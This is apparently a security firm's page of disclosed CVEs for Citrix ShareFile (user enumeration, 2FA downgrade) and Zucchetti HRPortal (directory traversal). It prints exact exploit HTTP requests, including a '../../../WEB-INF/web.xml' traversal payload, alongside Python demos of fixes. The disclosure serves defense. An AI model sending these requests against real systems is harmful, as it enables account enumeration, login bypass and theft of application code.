Research and Development

Our CVEs


CVE-2019-7217 : Citrix ShareFile User Enumeration

Summary
It is possible to enumerate application usernames based on the different server responses returned by the request that checks the OTP code.
No authentication is required.
Tested Versions
Citrix ShareFile through 19.1
Fixed Versions
Citrix ShareFile from version 19.12
Product URLs
https://www.sharefile.com/
Details
It is possible to enumerate application usernames based on the different server responses returned by the request that checks the OTP code.
No authentication is required.

Example:
It is possible to enumerate application usernames based on the different server
responses returned by the request that checks the OTP code, without user authentication:

Request:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&
response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&
state=FxwxORudhXUqUh3phnC6Mg%3D%3D&
redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&
h=&requireV3=false&code=123

Response if username is not correct:
{"error":true,"errorMessage":"You are not authorized to use this client","errorCode":126}

Response if username is correct:
{"error":true,"errorMessage":"Unable to verify two factor code.","errorCode":122}


Timeline
22-01-2019 Vendor disclosure
05-02-2019 Acknowledgement from vendor
02-05-2019 Public Release
CREDIT
Discovered by Armando Huesca and Andrea Pessione of SKIT (Shorr Kan IT Engineering srl)


CVE-2019-7218 : Citrix ShareFile TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR

Summary
An attacker with access to the victim’s offline OTP physical token or virtual app (like Google Authenticator) is able to bypass the first authentication phase (username/password mechanism) and log in using the username/OTP combination only (phase 2 of 2FA).
Tested Versions
Citrix ShareFile through 19.1
Fixed Versions
Citrix ShareFile from version 19.23
Product URLs
https://www.sharefile.com/
Details
An attacker with access to the victim’s offline OTP physical token or virtual app (like Google Authenticator) is able to bypass the first authentication phase (username/password mechanism) and log in using the username/OTP combination only (phase 2 of 2FA).
This way, it is possible to downgrade 2FA to 1FA without knowing the victim’s password.
In order to exploit this vulnerability, attackers must have access to the offline OTP token (physical or virtual): it is not possible to gain access if the OTP is generated after the phase 1 authentication and sent to the client via SMS or phone call.
This vulnerability occurs because the server does not check that the client’s phase 1 authentication succeeded before validating the phase 2 authentication (authentication schema).

Example:
An attacker is able to intercept the log-in request with garbage data and use
this request as the base for the attack, changing the op and password parameters as
follows:

Figure 1 - phase 1 default log-in request and response
[image1 not reproduced]

- change op=webflow-auth to op=webflow-verify

- change password=* to code=[OTP]

In case the username/OTP combination is correct (phase 2 succeeded),
phase 1 authentication is bypassed and the attacker gains unauthorized access
to the application, as shown below:

Figure 2 - evil phase 2 request with modified parameters
[image2 not reproduced]

The following figure shows the proof of unauthorized access to the web application
obtained by exploiting this vulnerability.

Figure 3 - Unauthorized access to the application
[image3 not reproduced]

ADVICE: Make sure that the client’s phase 1 authentication
succeeded before validating phase 2 authentication.
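As an added example (not ShareFile's code and not part of the original advisories), the following Python models both reported flaws and the advised fix in one simulated two-phase login flow. The user store, the RFC 4226 HOTP routine standing in for the OTP token, the session dictionary and the function names (webflow_auth, webflow_verify_vulnerable, webflow_verify_hardened, responses_differ) are assumptions made for this demonstration. The vulnerable phase 2 handler reproduces the two behaviours described above: it answers with errorCode 126 or 122 depending on whether the username exists (CVE-2019-7217), and it accepts a username/OTP pair with no phase 1 state at all (CVE-2019-7218). The hardened handler only accepts a code for the user that completed phase 1 in the same server-side session, consumes that state, and returns one generic error for every failure.

```python
import hashlib
import hmac
import struct

# Constructed demo user store (an assumption for this example). The OTP secret is the
# RFC 4226 test-vector secret so the HOTP routine can be checked against the RFC values.
USERS = {
    "alice@example.com": {
        "password": "correct horse battery staple",
        "secret": b"12345678901234567890",
        "counter": 0,
    },
}

# One error for every failed step: the caller learns nothing about which check failed.
GENERIC_ERROR = {"error": True, "errorMessage": "Invalid username, password or code.", "errorCode": 1}
DUMMY_PASSWORD = b"\x00" * 32


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def webflow_auth(session: dict, username: str, password: str) -> dict:
    """Phase 1 (op=webflow-auth): password check. On success the server-side session records
    which user passed phase 1; that record is the only thing that unlocks phase 2."""
    user = USERS.get(username)
    # Compare against a dummy for unknown users so the work done does not depend on existence.
    stored = user["password"].encode() if user else DUMMY_PASSWORD
    ok = hmac.compare_digest(stored, password.encode()) and user is not None
    if not ok:
        session.pop("phase1_user", None)
        return GENERIC_ERROR
    session["phase1_user"] = username
    return {"error": False, "next": "webflow-verify"}


def webflow_verify_vulnerable(session: dict, username: str, code: str) -> dict:
    """Phase 2 as reported: no check that phase 1 happened, and a user-dependent error."""
    user = USERS.get(username)
    if user is None:
        return {"error": True, "errorMessage": "You are not authorized to use this client", "errorCode": 126}
    if not hmac.compare_digest(hotp(user["secret"], user["counter"]), code):
        return {"error": True, "errorMessage": "Unable to verify two factor code.", "errorCode": 122}
    session["authenticated"] = username
    return {"error": False}


def webflow_verify_hardened(session: dict, username: str, code: str) -> dict:
    """Phase 2 with the advised fix: only the user who completed phase 1 in this session may
    present a code, the phase 1 state is single-use, and every failure looks identical."""
    if session.get("phase1_user") != username:
        return GENERIC_ERROR          # covers unknown users and skipped phase 1 alike
    user = USERS[username]            # guaranteed to exist: phase 1 succeeded for it
    if not hmac.compare_digest(hotp(user["secret"], user["counter"]), code):
        return GENERIC_ERROR
    session.pop("phase1_user")        # a second code needs a fresh phase 1
    user["counter"] += 1              # HOTP counters advance on a successful verification
    session["authenticated"] = username
    return {"error": False}


def responses_differ(verify, known_user: str, unknown_user: str) -> bool:
    """Enumeration check a defender can keep as a regression test: with no phase 1 state and a
    wrong code, does the handler answer differently for an existing and a non-existing user?"""
    return verify({}, known_user, "000000") != verify({}, unknown_user, "000000")


if __name__ == "__main__":
    print("vulnerable leaks user existence:", responses_differ(webflow_verify_vulnerable, "alice@example.com", "nobody@example.com"))
    print("hardened leaks user existence:  ", responses_differ(webflow_verify_hardened, "alice@example.com", "nobody@example.com"))
    otp = hotp(USERS["alice@example.com"]["secret"], USERS["alice@example.com"]["counter"])
    print("vulnerable accepts OTP without password:", not webflow_verify_vulnerable({}, "alice@example.com", otp)["error"])
    print("hardened accepts OTP without password:  ", not webflow_verify_hardened({}, "alice@example.com", otp)["error"])
```

The important design point is that the phase 1 result lives in server-side session state keyed to the username, not in anything the client sends back, so a request that skips straight to webflow-verify has nothing to unlock. A production version would also rate-limit and lock out repeated code failures; that is left out here to keep the state handling visible.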


Timeline
28-01-2019 Vendor disclosure
05-02-2019 Acknowledgement from vendor
02-05-2019 Public Release
CREDIT
Discovered by Andrea Pessione and Armando Huesca of SKIT (Shorr Kan IT Engineering srl)


CVE-2019-10257 : Zucchetti HRPortal DIRECTORY TRAVERSAL on the application login page

Summary
Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system.
Tested Versions
Zucchetti HRPortal (versions until 2019-03-15)
Product URLs
https://www.zucchetti.it/website/cms/prodotto/2970-portale-risorse-umane.html
Details
DIRECTORY TRAVERSAL on Zucchetti HRPortal’s login page.
Using this vulnerability, unauthenticated users can escape outside of the restricted location to access files or directories that are elsewhere on the system. Through this vulnerability it is possible to read the application’s Java code (the compiled classes under /WEB-INF/classes/*.class).

Example:
../../../WEB-INF/classes/cp_login.class;

The following request reads the content of the web.xml file from the WEB-INF directory:

POST /hrportal/servlet/cp_login HTTP/1.1
Host: hrportal.XXXX.it
Accept-Encoding: gzip, deflate
Referer: https://hrportal.XXXX.it/hrportal/jsp/login.jsp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
 
m_cURLOnError=../../../WEB-INF/web.xml;

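As an added example that is not HRPortal's code, the following Python shows the difference between resolving a request-supplied path with a plain join and resolving it with the checks a defender would want: servlet path parameters stripped from each segment (so the trailing ";" in the request above does not hide the file name), the result confined to the application root, and WEB-INF/META-INF never reachable. The context root, the error-page table and the function names (strip_path_params, naive_resolve, safe_resolve, error_page_for) are assumptions for this demonstration; the request value is the one from the advisory, and input is assumed to be already URL-decoded by the framework.

```python
import posixpath

# Assumed on-disk context root of the web application (constructed, not HRPortal's real layout).
CONTEXT_ROOT = "/webapps/hrportal"
# Directories a servlet container must never serve, compared case-insensitively.
FORBIDDEN_SEGMENTS = {"web-inf", "meta-inf"}
# Assumed table of error pages: the client picks a key, the server alone knows the path.
ERROR_PAGES = {"login": "jsp/login.jsp", "expired": "jsp/expired.jsp"}


def strip_path_params(path: str) -> str:
    """Drop servlet-style path parameters (";name=value") from every segment, so that
    "web.xml;" and "web.xml;jsessionid=abc" both normalise to "web.xml"."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def naive_resolve(root: str, requested: str) -> str:
    """What a plain join does with the request value: '..' segments walk out of the root."""
    return posixpath.normpath(posixpath.join(root, requested))


def safe_resolve(root: str, requested: str):
    """Return the absolute path if it stays inside root and never enters a forbidden
    directory; return None for anything that should be refused."""
    cleaned = strip_path_params(requested)
    # Absolute paths, backslashes and NUL bytes have no legitimate use in a page name.
    if cleaned.startswith("/") or "\\" in cleaned or "\x00" in cleaned:
        return None
    root_norm = posixpath.normpath(root)
    resolved = posixpath.normpath(posixpath.join(root_norm, cleaned))
    # Containment check: the resolved path must be the root or a descendant of it.
    if resolved != root_norm and not resolved.startswith(root_norm + "/"):
        return None
    # Even inside the root, WEB-INF and META-INF are off limits.
    for segment in resolved[len(root_norm):].split("/"):
        if segment.lower() in FORBIDDEN_SEGMENTS:
            return None
    return resolved


def error_page_for(key: str) -> str:
    """Preferred design for a parameter like m_cURLOnError: map a key to a server-chosen page
    and fall back to the login page for anything unknown, so no path comes from the request."""
    return safe_resolve(CONTEXT_ROOT, ERROR_PAGES.get(key, ERROR_PAGES["login"]))


if __name__ == "__main__":
    reported = "../../../WEB-INF/web.xml;"   # value from the advisory's request body
    print("naive :", naive_resolve(CONTEXT_ROOT, reported))
    print("safe  :", safe_resolve(CONTEXT_ROOT, reported))
    print("mapped:", error_page_for(reported))
```

The checks are lexical, so on a real file system the resolved path should additionally be passed through os.path.realpath (or served through the container's resource API) to stop symbolic links from reintroducing the escape. The error_page_for mapping is the cleaner fix for this class of parameter: once the client can only select a key, there is no path left to traverse.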
Timeline
15-03-2019 Vendor disclosure
28-03-2019 No acknowledgement from vendor
02-04-2019 New vendor disclosure directly to company CSO xxxx.yyyy@zucchetti.it
28-04-2019 No acknowledgement from vendor
15-06-2019 Public Release
CREDIT
Discovered by Andrea Pessione of SKIT (Shorr Kan IT Engineering srl)


New CVEs in the next episode ...